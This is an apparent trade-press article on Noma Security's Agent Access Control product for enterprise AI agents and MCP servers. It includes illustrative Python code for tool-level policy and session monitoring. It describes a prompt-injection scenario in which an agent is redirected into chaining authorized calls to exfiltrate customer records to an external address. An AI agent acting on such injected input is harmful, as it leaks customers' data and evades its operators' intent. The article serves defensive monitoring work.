CyberTech Intelligence

Enterprise Security Teams Are Confronting the Growing Governance Gap Around AI Agents

Enterprise security teams spent the better part of two decades building identity and access management infrastructure around a relatively stable assumption: the entities requesting access to systems and data are humans, service accounts, or known application processes, each with documented purposes and established identity credentials that governance frameworks can track and control.

AI agents have invalidated that assumption faster than most security programs were positioned to respond. In under twelve months, enterprises that were running a handful of agent experiments have found themselves operating dozens or hundreds of autonomous agents, each connecting to sensitive data repositories, invoking tools that execute real actions in production systems, and doing so under access models that were never designed for entities that reason dynamically about what to do next rather than following deterministic execution paths.

The governance gap this created is not subtle. Agents connecting to Model Context Protocol servers under shared service account credentials make attribution impossible when something goes wrong. Security teams that cannot answer basic questions about which agents are running, what they are connected to, what tools they can invoke, and under whose authority they are operating cannot make meaningful access control decisions for any of them. The inventory problem precedes the policy problem, and both precede the runtime enforcement problem.

Noma’s Agent Access Control, launched this week as an addition to the company’s enterprise AI and agent security platform, addresses all three dimensions of that governance gap in sequence: discover what is running, establish attributable identity, define and enforce policy at the tool level, and then layer behavioral monitoring on top to catch what policy definitions alone cannot anticipate.

Why Access Policy Alone Is Not Sufficient Governance for AI Agents

The security intuition carried over from traditional identity and access management into agentic environments is that defining what an agent is authorized to do constitutes the primary governance control. That intuition is partially correct and partially dangerous as applied to AI agents, for a reason that distinguishes agentic systems from every prior class of enterprise software.

Traditional service accounts and application integrations execute within the scope of their authorization in ways that are fully determined by their code. A service account authorized to read customer records reads customer records. It does not reason about whether it should also export those records to a third-party endpoint based on the content of an instruction it received at runtime. The authorization boundary and the behavioral boundary are effectively the same.

AI agents sever that equivalence. An agent authorized to read customer records and send communications on behalf of users can, if it encounters a malicious prompt injection in the data it retrieves, be redirected to combine those two authorized capabilities in a sequence that accomplishes data exfiltration while never technically exceeding its stated permissions. The agent misused its legitimately granted authorization. No access policy defined at configuration time anticipates every combination of authorized actions that a sufficiently adversarial runtime input can construct.

Noma CEO Niv Braun’s articulation of this distinction, that agents are influenced by everything they encounter at runtime, including prompts, tool responses, and retrieved data, and that a single malicious input can redirect behavior in ways no access policy anticipates, describes the specific threat model that makes runtime behavioral monitoring an architectural requirement rather than a supplementary feature for mature programs.

The two-layer governance architecture Noma has built reflects this reality directly. Layer one defines the authorization boundary. Layer two verifies at runtime that agent behavior remains within the intent that authorization was designed to express, not just within the letter of what each action was permitted to do.

The Inventory Problem and Why It Has to Be Solved First

Security teams cannot govern what they cannot see, and the inventory challenge for enterprise AI agents is more complex than the equivalent challenge for traditional software assets.

Traditional software assets are deployed through change management processes that create records. Cloud infrastructure is provisioned through APIs that log creation events. Both categories of assets are, at least in principle, discoverable through the change and provisioning records that enterprise asset management programs track.

AI agents do not uniformly enter enterprise environments through governed deployment channels. Developer teams building agentic applications connect to MCP servers and configure agent toolsets in the course of normal development work. Tools like Claude Desktop, Cursor, and similar development environments make it straightforward to connect agents to external services without engaging the procurement or security review processes that formal software deployment requires. An enterprise that has deployed a formal AI governance framework for its centrally managed AI initiatives may simultaneously have hundreds of developer-configured agents operating outside that framework’s visibility.

Noma Agent Access Control’s automated registry addresses this discovery challenge by identifying every agent and connected MCP server across the enterprise environment and building a continuous, real-time inventory with risk context attached. The registry surfaces what each MCP server exposes, which agents connect to it, and where each connection stands against current security policies, without requiring weeks of manual assessment work to establish an initial baseline.

The risk context attachment is operationally significant beyond the discovery function. An inventory that lists agents and connections without indicating which ones present elevated risk against current policies requires human analysis to prioritize. A registry that surfaces risk posture alongside inventory allows security teams to direct attention immediately toward the highest-priority items rather than working through a flat list.

Tool-Level Granularity and Why Coarse Controls Create Unnecessary Friction

The governance model in Noma Agent Access Control reflects an architectural choice that has direct implications for how enterprise security teams can manage the tension between AI deployment velocity and security control requirements.

Conventional access control approaches applied to MCP servers treat the server as the unit of authorization. An agent either has access to a server or it does not. That granularity is operationally adequate for server types with uniform risk profiles, but it creates an unacceptable binary for the mixed-risk MCP servers that enterprise environments commonly deploy. A single MCP server may expose a read-only file access tool alongside a tool that can delete records, send external communications, or modify system configurations. Blocking access to the server to prevent exposure to the high-risk tools also blocks access to the legitimate low-risk tools that development workflows depend on.

Tool-level control resolves that tension by allowing security teams to approve or block individual tools within a server rather than making all-or-nothing server-level decisions. The policy granularity extends further to agent type, user, team, and deployment environment, which means that the same tool can be approved for a production agent with a defined, audited purpose while remaining blocked for experimental agents in developer environments without requiring separate server deployments to enforce that distinction.

The governance model has three states: Approved, Requires Review, and Blocked. Approved connections operate with zero friction, and Blocked connections are prevented automatically, without manual intervention at each occurrence. That design reflects a practical understanding of how security controls need to function in environments where the volume of agents and tool connections exceeds what case-by-case human review can manage.

The Requires Review queue with full risk context attached is the critical middle tier. It creates a structured path for the ambiguous cases that binary approved/blocked models handle poorly, allowing security teams to make informed decisions against a defined risk context rather than either blocking by default on everything uncertain or approving by default to avoid deployment friction.
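The tool-level, context-scoped policy model and the three-state outcome described above can be made concrete with a small evaluator. The following is an added example written for this article, not Noma's code or API: the server and tool names, the agent types, teams and environments, and the policy rules are all constructed for illustration. It shows how a rule for one tool on a mixed-risk MCP server can be approved for a production agent in a defined context while the same tool, called from an experimental agent in a developer environment, falls into the review queue rather than being approved or blocked outright, and how an unregistered server (the inventory gap) also lands in review instead of being silently allowed.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Optional


class Decision(Enum):
    APPROVED = "approved"
    REQUIRES_REVIEW = "requires_review"
    BLOCKED = "blocked"


# When two rules of equal specificity both match, the more restrictive one wins.
_RESTRICTIVENESS = {Decision.APPROVED: 0, Decision.REQUIRES_REVIEW: 1, Decision.BLOCKED: 2}

SCOPE_ATTRS = ("server", "tool", "agent_type", "environment", "team")


@dataclass(frozen=True)
class ToolCall:
    agent_id: str
    agent_type: str     # constructed labels: "production" or "experimental"
    team: str
    environment: str    # "prod" or "dev"
    server: str         # MCP server the agent is connected to
    tool: str           # tool exposed by that server


@dataclass(frozen=True)
class Rule:
    server: str
    tool: Optional[str]               # None matches every tool on the server
    decision: Decision
    agent_type: Optional[str] = None  # None means the rule applies to any agent type
    environment: Optional[str] = None
    team: Optional[str] = None

    def matches(self, call: ToolCall) -> bool:
        return all(getattr(self, a) is None or getattr(self, a) == getattr(call, a)
                   for a in SCOPE_ATTRS)

    def specificity(self) -> int:
        # A tool-specific, environment-scoped rule outranks a server-wide wildcard.
        return sum(getattr(self, a) is not None for a in SCOPE_ATTRS)


@dataclass(frozen=True)
class Verdict:
    decision: Decision
    reason: str  # risk context carried into the review queue


def evaluate(call: ToolCall, policy) -> Verdict:
    """Most specific matching rule wins; unknown servers/tools go to review, never to approval."""
    matching = [r for r in policy if r.matches(call)]
    if not matching:
        # No rule at all means an inventory gap, which is exactly what review is for.
        return Verdict(Decision.REQUIRES_REVIEW, f"no rule covers {call.server}/{call.tool}")
    best = max(matching, key=lambda r: (r.specificity(), _RESTRICTIVENESS[r.decision]))
    scope = ", ".join(f"{a}={getattr(best, a)}" for a in SCOPE_ATTRS[2:]
                      if getattr(best, a) is not None) or "any context"
    return Verdict(best.decision,
                   f"{best.server}/{best.tool or '*'} is {best.decision.value} for {scope}")


def review_queue(calls, policy):
    """Calls that land in Requires Review, each with its reason attached for the analyst."""
    queue = []
    for c in calls:
        verdict = evaluate(c, policy)
        if verdict.decision is Decision.REQUIRES_REVIEW:
            queue.append((c.agent_id, f"{c.server}/{c.tool}", verdict.reason))
    return queue


# Constructed policy for a hypothetical mixed-risk "crm" server and a "files" server.
POLICY = [
    Rule("crm", "read_customer", Decision.APPROVED, agent_type="production", environment="prod"),
    Rule("crm", "send_external_email", Decision.APPROVED,
         agent_type="production", environment="prod", team="support"),
    Rule("crm", "delete_record", Decision.BLOCKED),       # blocked for everyone, every context
    Rule("crm", None, Decision.REQUIRES_REVIEW),          # any other crm tool or other context
    Rule("files", "read_file", Decision.APPROVED),
    Rule("files", "write_file", Decision.REQUIRES_REVIEW),
]

if __name__ == "__main__":
    calls = [
        ToolCall("billing-bot", "production", "support", "prod", "crm", "read_customer"),
        ToolCall("dev-sandbox", "experimental", "support", "dev", "crm", "read_customer"),
        ToolCall("billing-bot", "production", "support", "prod", "crm", "delete_record"),
        ToolCall("dev-sandbox", "experimental", "platform", "dev", "jira", "create_issue"),
    ]
    for c in calls:
        print(c.agent_id, f"{c.server}/{c.tool}", evaluate(c, POLICY))
    print("review queue:", review_queue(calls, POLICY))
```

The design choice worth noting is the default: a call that matches no rule is routed to review rather than approved, so a newly connected MCP server that the registry has not yet been given policy for cannot be used as a quiet bypass, and the review item carries the reason so the analyst does not have to reconstruct why it is there.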

Behavioral Chain Monitoring and the Multi-Step Exfiltration Problem

The runtime enforcement layer that Noma’s AI Detection and Response capability provides addresses the specific threat pattern that access policy definitions structurally cannot anticipate: the multi-step action sequence where each step is within authorized scope, but the complete sequence accomplishes something the authorization was never intended to permit.

The example Noma describes is concrete and worth examining for what it reveals about the detection challenge. An agent that retrieves customer records and then, three steps later, sends a summary to an external address may have been technically authorized to perform both actions. Each step, evaluated independently against the agent’s policy, appears compliant. The exfiltration is only visible in the sequence: retrieval followed by external transmission of the retrieved content. No access policy written against individual actions can flag that sequence without the ability to evaluate the full behavioral chain.

Behavioral chain monitoring that evaluates the complete sequence of prompts, tool calls, data access events, and actions taken within an agent session creates the detection surface for that threat pattern. The integration between Noma’s AI-DR capability and Agent Access Control closes the context gap that would otherwise force the detection layer to operate without the authorization baseline it needs to distinguish authorized sequences from malicious ones.

An agent that retrieves customer records is either authorized to do so or it is not. The AI-DR layer needs to know which is the case to evaluate whether the retrieval is itself suspicious or whether the suspicion arises from what the agent does with the retrieved data in subsequent steps. Shared context between the access control layer and the detection layer, where both operate against the same agent identity and policy definitions, is what makes that evaluation possible without requiring security analysts to manually correlate access control records with behavioral logs.
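The multi-step exfiltration pattern described in this section, and the point that the detection layer needs the authorization context, can be shown with a session-level monitor. This is an added example written for this article, not Noma's AI-DR implementation; the tool names, the authorized-tool set, the internal domain and the two sessions are constructed. Each call in the first session is individually authorized, and only the chain (a sensitive retrieval at step 1 followed, three steps later, by an email to an external address) produces a finding; the second session sends the same summary to an internal address and produces none. An unauthorized tool is reported at the step it occurs, which is the case the access-control layer handles on its own.

```python
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class Event:
    step: int
    tool: str   # "<server>.<tool>" as invoked by the agent
    args: dict  # arguments the agent passed to the tool


@dataclass(frozen=True)
class Finding:
    kind: str
    step: int
    detail: str


# Shared context the detection layer takes from the access-control layer.
# All values below are constructed for this example.
SENSITIVE_SOURCES = {"crm.read_customer": "customer_records"}
EGRESS_TOOLS = {"email.send": "to", "http.post": "url"}  # tool -> argument naming the destination
INTERNAL_DOMAINS = {"example-corp.com"}


def is_external(destination: str) -> bool:
    """True when an e-mail address or URL points outside the organisation's own domains."""
    if "@" in destination:
        host = destination.rsplit("@", 1)[1]
    else:
        host = urlparse(destination).hostname or destination
    host = host.lower()
    return not any(host == d or host.endswith("." + d) for d in INTERNAL_DOMAINS)


def monitor_session(events, authorized_tools):
    """Evaluate the whole chain of a session, not each call in isolation.

    Unauthorized calls are flagged where they occur. An external transmission is
    flagged only if sensitive data was retrieved earlier in the same session,
    however many authorized steps sit in between.
    """
    findings = []
    retrieved = []  # (step, label) of sensitive data pulled into the session so far
    for e in events:
        if e.tool not in authorized_tools:
            # The access-control layer would block this; record it so the chain stays complete.
            findings.append(Finding("unauthorized_tool", e.step, f"{e.tool} is not authorized"))
            continue
        if e.tool in SENSITIVE_SOURCES:
            retrieved.append((e.step, SENSITIVE_SOURCES[e.tool]))
        if e.tool in EGRESS_TOOLS:
            dest = str(e.args.get(EGRESS_TOOLS[e.tool], ""))
            if retrieved and is_external(dest):
                origin = ", ".join(f"{label} (step {step})" for step, label in retrieved)
                findings.append(Finding(
                    "exfiltration_chain", e.step,
                    f"{e.tool} to external destination {dest} after retrieving {origin}"))
    return findings


AUTHORIZED = {"crm.read_customer", "notes.append", "files.read_file", "email.send"}

# Constructed session: every call is individually authorized; only the sequence is malicious.
INJECTED_SESSION = [
    Event(1, "crm.read_customer", {"customer_id": "C-1042"}),
    Event(2, "notes.append", {"text": "summary of C-1042"}),
    Event(3, "files.read_file", {"path": "/docs/faq.md"}),
    Event(4, "email.send", {"to": "collector@mail.example", "body": "summary of C-1042"}),
]

# Constructed benign session: same retrieval, summary stays inside the organisation.
BENIGN_SESSION = [
    Event(1, "crm.read_customer", {"customer_id": "C-1042"}),
    Event(2, "email.send", {"to": "agent.owner@example-corp.com", "body": "summary of C-1042"}),
]

if __name__ == "__main__":
    for name, session in (("injected", INJECTED_SESSION), ("benign", BENIGN_SESSION)):
        print(name, monitor_session(session, AUTHORIZED) or "no findings")
```

The `authorized_tools` argument is the shared context the section describes: without it the monitor could not tell whether the retrieval at step 1 is itself the problem (an unauthorized call) or whether the problem only appears when the retrieved data later leaves the organisation.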

Security Architecture Implications for Enterprise AI Programs

Enterprise security architecture teams evaluating their AI governance frameworks should interpret Noma’s launch as a signal of where the agentic security category is maturing, and assess their current posture against the capability gaps it identifies.

The sequence of governance requirements that Agent Access Control addresses, inventory before policy before enforcement, maps directly onto the maturity stages that enterprise AI security programs need to progress through. Organizations that have not yet solved the inventory problem cannot have meaningful policy discussions because they do not know what they are setting policy for. Organizations that have established basic inventory but have not implemented attributable agent identity cannot enforce policy consistently, because they cannot reliably associate actions with the agents that took them. Organizations that have defined and enforced access policy but have not layered behavioral monitoring on top remain exposed to the multi-step attack patterns that policy definitions alone do not catch.

That maturity framing has direct budget implications. The organizations furthest behind on the inventory and identity dimensions face the largest and most immediate exposure, and their path to adequate governance requires solving earlier-stage problems before the later-stage ones become tractable. The organizations that have made meaningful progress on inventory and access policy governance are the most immediate qualified buyers for behavioral monitoring capabilities, because they have the foundation that makes behavioral monitoring analytically effective.

Where Enterprise AI Security Investment Is Concentrating

The agentic AI security category has moved from early-stage awareness to active enterprise evaluation in a compressed timeframe that reflects the speed of AI agent deployment in enterprise environments. Security vendor categories that were not specifically designed for agentic threat models twelve months ago are now under pressure to demonstrate agentic security coverage, and the gap between vendors that have built purpose-designed agentic governance capabilities and those that have extended existing capabilities to cover agent use cases is becoming visible in enterprise evaluations.

The MCP server governance requirement is emerging as a specific evaluation criterion in enterprise AI security assessments as MCP adoption accelerates beyond developer tools into production enterprise agent deployments. Organizations standardizing on MCP as their agent connectivity protocol need governance tooling that understands MCP’s access and authorization architecture natively, rather than treating it as a generic API endpoint.

Buyer Signals Worth Tracking

Security engineering and architecture teams actively inventorying their enterprise agent deployments represent the earliest qualified buyer cohort, because the inventory problem is the admission that governance is not currently adequate, and solving the inventory problem is the first step toward everything that follows. Organizations that have already deployed formal AI governance programs for centrally managed AI initiatives but have not yet extended that governance to developer-configured agents and MCP connections are the most immediate pipeline segment, because they have already made the organizational investment in AI security governance and face the known gap of ungoverned developer-configured agents.

The DevSecOps and platform engineering teams responsible for developer tool governance are a parallel buyer segment that is often underweighted in AI security marketing but represents meaningful budget influence over the agent and MCP server governance decisions that are currently being made informally in developer environments.

The Governance Debt That Is Accumulating in Ungoverned Agent Environments

Enterprise organizations that have allowed AI agent deployment to outpace their governance frameworks are accumulating security and compliance debt at a rate that compounds with each additional agent deployment. Every agent running without attributable identity, every MCP connection operating without policy definition, and every tool invocation occurring outside behavioral monitoring coverage represents an unquantified risk exposure that grows as the agent inventory expands.

The organizations that establish inventory visibility, attributable identity, and tool-level access control now are not simply improving their current security posture. They are stopping the accumulation of governance debt before it reaches a scale where the remediation work required to bring the full agent inventory into compliance becomes a major program in itself rather than an incremental governance improvement.

Noma’s architecture, which builds from automated discovery to identity assignment, policy enforcement, and behavioral monitoring in a single integrated platform, provides a path from ungoverned agent sprawl to comprehensive governance without requiring organizations to solve each layer with separate tools and then manage the integration between them. For enterprise security teams that are currently behind on AI agent governance, the compounding nature of the debt makes the timing of that remediation more consequential than it might appear in a more static risk environment.

Research and Intelligence Sources: Noma Security
